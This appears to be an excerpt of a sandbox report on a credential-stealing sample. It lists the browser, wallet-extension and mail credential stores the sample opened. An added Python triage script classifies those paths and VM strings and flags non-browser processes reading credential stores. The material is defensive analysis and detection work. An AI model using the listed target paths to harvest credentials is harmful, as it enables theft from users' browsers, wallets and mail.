Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_hnfanknocfeofbddgcijnmhnfnkdnaad_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
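Added triage example; this is not part of the Joe Sandbox report or of the sample. The file-open list above and the VMware/Hyper-V strings in the anti-analysis section are the two things an analyst usually pulls out of a report like this, and both reduce to the same path and string classification. The script parses a handful of report lines copied from this page, groups the credential stores the sample touched (Firefox logins.json and signons.sqlite, Firefox history and form databases, Chrome extension storage by extension ID, Thunderbird/Cyberfox/BlackHawk profiles.ini, the Outlook MAPI profile key), and separates VM strings found in the sample's own memory (`.sdmp` sources such as the `Ven_VMware` SCSI device path and `Hyper-V RAW`) from VM strings found in a dropped file (`Web Data.0.dr`, the copy of Chrome's database the stealer wrote, whose `VMware20,1...` entries carry a hardware model string of the analysis VM rather than a check the sample performs). The same classifier then runs over constructed endpoint file-access events to flag non-browser processes reading these stores, which is the detection a defender would derive from this section. Assumptions: the extension-ID table maps only `nkbihfbeogaeaoehlefnkodbefgpgknn` (MetaMask) and reports every other ID as unmapped; the browser allow-list and the endpoint events are constructed for the example.

```python
"""Added example: classify what a stealer touched, from sandbox report lines or endpoint events."""
import re
from collections import Counter

# Constructed sample input: ten lines copied verbatim from the Joe Sandbox report above.
REPORT_LINES = [
    r"Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}",
    r"Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x",
    r"Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior",
]

# One report line: "Source: <src> <kind>: <value>", with the HTML link label "Jump to behavior" dropped.
LINE = re.compile(r"^Source: (?P<src>.+?) (?P<kind>File opened|Key opened|Binary or memory string): "
                  r"(?P<value>.+?)(?: Jump to behavior)?$")
EXT_ID = r"[a-p]{32}"  # Chrome extension IDs are 32 letters drawn from a-p
STORE_PATTERNS = [  # (regex, category); group(1) is the detail worth keeping
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(logins\.json|signons\.sqlite|key[34]\.db)$", re.I), "firefox_logins"),
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(places|formhistory|cookies)\.sqlite$", re.I), "firefox_history"),
    (re.compile(r"\\(Thunderbird|Mozilla\\Firefox|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$", re.I), "gecko_profile_index"),
    (re.compile(r"\\Chrome\\User Data\\[^\\]+\\(?:Local|Sync) Extension Settings\\(" + EXT_ID + r")\\", re.I), "chrome_extension_storage"),
    (re.compile(r"\\Chrome\\User Data\\[^\\]+\\IndexedDB\\chrome-extension_(" + EXT_ID + r")_0\.indexeddb\.leveldb\\", re.I), "chrome_extension_storage"),
]
KNOWN_EXTENSIONS = {"nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask"}  # assumption: only this ID is mapped here
OUTLOOK_PROFILE_KEY = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.I)
VM_MARKERS = re.compile(r"ven_vmware|vmware\d+,\d|hyper-v|vbox|qemu", re.I)


def classify_path(path):
    """Return (category, detail) if the path is a browser or mail credential store, else None."""
    for rx, category in STORE_PATTERNS:
        m = rx.search(path)
        if m:
            detail = m.group(1)
            if category == "chrome_extension_storage":
                detail = KNOWN_EXTENSIONS.get(detail.lower(), "unmapped:" + detail.lower())
            return category, detail
    return None


def triage_report(lines):
    """Summarise the credential stores a sample touched and where its VM-related strings live."""
    summary = {"credential_stores": Counter(), "targets": [], "vm_strings": []}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        src, kind, value = m.group("src", "kind", "value")
        if kind == "File opened":
            hit = classify_path(value)
            if hit:
                summary["credential_stores"][hit[0]] += 1
                summary["targets"].append(hit)
        elif kind == "Key opened" and OUTLOOK_PROFILE_KEY.search(value):
            summary["credential_stores"]["outlook_profile"] += 1
            summary["targets"].append(("outlook_profile", value.rsplit("\\", 1)[-1]))
        elif kind == "Binary or memory string" and VM_MARKERS.search(value):
            # A ".dr" source is a file the sample dropped (here a copy of Chrome's Web Data), so a VM
            # model string inside it describes the analysis host, not a check the sample performs.
            origin = "dropped_file_content" if src.endswith(".dr") else "sample_memory"
            summary["vm_strings"].append((origin, value))
    return summary


# Detection side: the same classifier over endpoint file-access telemetry.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "thunderbird.exe"}  # assumption: tune per fleet
ENDPOINT_EVENTS = [  # constructed events: image that opened the file, and the file path
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json"},
    {"image": r"C:\Users\user\Desktop\file.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json"},
    {"image": r"C:\Users\user\Desktop\file.exe", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT"},
    {"image": r"C:\Windows\explorer.exe", "target": r"C:\Users\user\Documents\notes.txt"},
]


def detect_credential_store_access(events):
    """Alert on processes outside the browser allow-list opening credential stores.
    Returns one (image, category, detail) per hit; one image hitting several stores in
    a short window is the pattern the report shows for file.exe."""
    alerts = []
    for ev in events:
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        hit = classify_path(ev["target"])
        if hit and image_name not in BROWSER_IMAGES:
            alerts.append((ev["image"], hit[0], hit[1]))
    return alerts


if __name__ == "__main__":
    s = triage_report(REPORT_LINES)
    print("credential stores:", dict(s["credential_stores"]))
    for category, detail in s["targets"]:
        print("  ", category, detail)
    for origin, value in s["vm_strings"]:
        print("VM string in", origin, "->", value[:60])
    for alert in detect_credential_store_access(ENDPOINT_EVENTS):
        print("ALERT", alert)
```

Run it as-is to see the grouped stores and the two provenance classes for the VM strings; feed it a full report export (one line per entry) to triage other samples, and extend `STORE_PATTERNS` with Chromium `Login Data`, `Cookies` and `Web Data` paths when the report lists them.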

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, type: DROPPED